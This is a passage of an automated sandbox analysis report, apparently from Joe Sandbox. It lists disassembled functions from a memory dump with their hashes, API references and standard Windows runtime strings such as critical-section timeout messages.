                                                        • Instruction Fuzzy Hash: 5181BB30E152499ADF2CCE68C9927BFBBB6AF45320F1CC65AD861A73D0C630C8518B54
                                                        Function 036720E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4571886070.0000000003590000.00000040.00001000.00020000.00000000.sdmp, Offset: 03590000, based on PE: true
                                                        • Associated: 0000000A.00000002.4571886070.00000000036B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000A.00000002.4571886070.00000000036BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000A.00000002.4571886070.000000000372E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_3590000_compact.jbxd
                                                        Similarity
                                                        • API ID: ___swprintf_l
                                                        • String ID: %%%u$[$]:%u
                                                        • API String ID: 48624451-2819853543
                                                        • Opcode ID: 2e1338d7826249c38b7ea3b0b8ab6add6a9506c845d1c64b78cc6efed45624e0
                                                        • Instruction ID: b382abcb97ff7f3548f583ca81456695c6da71f6d5f426b726a12781ab303836
                                                        • Opcode Fuzzy Hash: 2e1338d7826249c38b7ea3b0b8ab6add6a9506c845d1c64b78cc6efed45624e0
                                                        • Instruction Fuzzy Hash: BD21657AE00259ABCB10DF79DD50AEFBBF8FF44640F48051AEA45E7240E730DA158BA1
                                                        Function 035EF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 036302BD
                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 036302E7
                                                        • RTL: Re-Waiting, xrefs: 0363031E
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4571886070.0000000003590000.00000040.00001000.00020000.00000000.sdmp, Offset: 03590000, based on PE: true
                                                        • Associated: 0000000A.00000002.4571886070.00000000036B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000A.00000002.4571886070.00000000036BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000A.00000002.4571886070.000000000372E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_3590000_compact.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                        • API String ID: 0-2474120054
                                                        • Opcode ID: ee9cbe7951043fb8bfe28a861e9fe37efd5dd638b015044e702e37f871cb492d
                                                        • Instruction ID: 4873e6c851674159df2b106f5967626226965a3d2ebb63dce7573dbe4cc2b2c0
                                                        • Opcode Fuzzy Hash: ee9cbe7951043fb8bfe28a861e9fe37efd5dd638b015044e702e37f871cb492d
                                                        • Instruction Fuzzy Hash: F2E1BE306087419FD729CF28D984B2AB7E4BF89314F190A6DF5A68B3E1DB74D845CB42
                                                        Function 035FBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03637B7F
                                                        • RTL: Resource at %p, xrefs: 03637B8E
                                                        • RTL: Re-Waiting, xrefs: 03637BAC
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4571886070.0000000003590000.00000040.00001000.00020000.00000000.sdmp, Offset: 03590000, based on PE: true
                                                        • Associated: 0000000A.00000002.4571886070.00000000036B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000A.00000002.4571886070.00000000036BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000A.00000002.4571886070.000000000372E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_3590000_compact.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                        • API String ID: 0-871070163
                                                        • Opcode ID: 0f5d4e469f4c4b46581169105c065f3cff33810a6f23a20bce924e08ea74a3c5
                                                        • Instruction ID: 78fc6b90ccadf991e5156ab1b523ae70f726d026e62dfd3c666cd5972d5c4ed0
                                                        • Opcode Fuzzy Hash: 0f5d4e469f4c4b46581169105c065f3cff33810a6f23a20bce924e08ea74a3c5
                                                        • Instruction Fuzzy Hash: 1041E1357007029FC724CE29DD40B6BB7E5FF89710F040A1DEA5A9B690DB71E4058B95
                                                        Function 035FB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0363728C
                                                        Strings
                                                        • RTL: Resource at %p, xrefs: 036372A3
                                                        • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03637294
                                                        • RTL: Re-Waiting, xrefs: 036372C1
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4571886070.0000000003590000.00000040.00001000.00020000.00000000.sdmp, Offset: 03590000, based on PE: true
                                                        • Associated: 0000000A.00000002.4571886070.00000000036B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000A.00000002.4571886070.00000000036BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000A.00000002.4571886070.000000000372E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_3590000_compact.jbxd
                                                        Similarity
                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                        • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                        • API String ID: 885266447-605551621
                                                        • Opcode ID: 34026a34cb942dac15ec0892ca636c4f9adb7418f001f8e4a425a7e3029d7073
                                                        • Instruction ID: 76f4cb105927c4155c4c3f04593a4ce2135fcab32e6e7635a33bdc3aeb09ac9e
                                                        • Opcode Fuzzy Hash: 34026a34cb942dac15ec0892ca636c4f9adb7418f001f8e4a425a7e3029d7073
                                                        • Instruction Fuzzy Hash: 93412075B04706AFC720CE24DD41F6AB7A6FF85710F180A19F955EB380DB21E8028BD8
                                                        Function 03672300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4571886070.0000000003590000.00000040.00001000.00020000.00000000.sdmp, Offset: 03590000, based on PE: true
                                                        • Associated: 0000000A.00000002.4571886070.00000000036B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000A.00000002.4571886070.00000000036BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000A.00000002.4571886070.000000000372E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_3590000_compact.jbxd
                                                        Similarity
                                                        • API ID: ___swprintf_l
                                                        • String ID: %%%u$]:%u
                                                        • API String ID: 48624451-3050659472
                                                        • Opcode ID: 9b95327959327fbd2182c505eecee02497cb07ebeda14948262994f2bc9fc8f1
                                                        • Instruction ID: 4974ce608fc7bd3214e641016d025d2569edd344efe5932e3eff19e4b93c286b
                                                        • Opcode Fuzzy Hash: 9b95327959327fbd2182c505eecee02497cb07ebeda14948262994f2bc9fc8f1
                                                        • Instruction Fuzzy Hash: FD317876A006199FCB20DF29DD50BEFB7F8EF44610F844559E849E7244EB30AA558FA0
                                                        Function 03607D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4571886070.0000000003590000.00000040.00001000.00020000.00000000.sdmp, Offset: 03590000, based on PE: true
                                                        • Associated: 0000000A.00000002.4571886070.00000000036B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000A.00000002.4571886070.00000000036BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000A.00000002.4571886070.000000000372E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_3590000_compact.jbxd
                                                        Similarity
                                                        • API ID: __aulldvrm
                                                        • String ID: +$-
                                                        • API String ID: 1302938615-2137968064
                                                        • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                        • Instruction ID: f4fcbe91393c223fdfb96dc07d08f52fb6a5cc017c9390f582636fbe70df6433
                                                        • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                        • Instruction Fuzzy Hash: AC918370E0021A9BDF2CDE69DA826BFB7A5FF44760F18455AE865E73C0E730A941CB50
                                                        Function 035C9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4571886070.0000000003590000.00000040.00001000.00020000.00000000.sdmp, Offset: 03590000, based on PE: true
                                                        • Associated: 0000000A.00000002.4571886070.00000000036B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000A.00000002.4571886070.00000000036BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000A.00000002.4571886070.000000000372E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_3590000_compact.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $$@
                                                        • API String ID: 0-1194432280
                                                        • Opcode ID: 5ec452b9e3573a5d4de93e768244b61940bbacd6c4861d92f31e61bcc9e3355a
                                                        • Instruction ID: a3b7d49315014c935fecc3ffced5cbf60cff7a0707d664b4d2cb8913e0573473
                                                        • Opcode Fuzzy Hash: 5ec452b9e3573a5d4de93e768244b61940bbacd6c4861d92f31e61bcc9e3355a
                                                        • Instruction Fuzzy Hash: C0814B76D106699FDB31CB94CC45BEABAB8BB48710F0545DAA909B7250E7309E80CFA0
                                                        Function 0364CEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 0364CFBD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4571886070.0000000003590000.00000040.00001000.00020000.00000000.sdmp, Offset: 03590000, based on PE: true
                                                        • Associated: 0000000A.00000002.4571886070.00000000036B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000A.00000002.4571886070.00000000036BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000A.00000002.4571886070.000000000372E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_3590000_compact.jbxd
                                                        Similarity
                                                        • API ID: CallFilterFunc@8
                                                        • String ID: @$@4Cw@4Cw
                                                        • API String ID: 4062629308-3101775584
                                                        • Opcode ID: 4601c80cd324028773e4ac7cc878accbf365fedf746e4e1fe078a3734950e631
                                                        • Instruction ID: 95afa6e94e8acb8b1be630c16d26513f35241633021b897cf6393a27f8e42acb
                                                        • Opcode Fuzzy Hash: 4601c80cd324028773e4ac7cc878accbf365fedf746e4e1fe078a3734950e631
                                                        • Instruction Fuzzy Hash: 30417B75E002199FCB21EFA9D940AAEBBB8FF84B00F14442AE915DB365E734D841CB65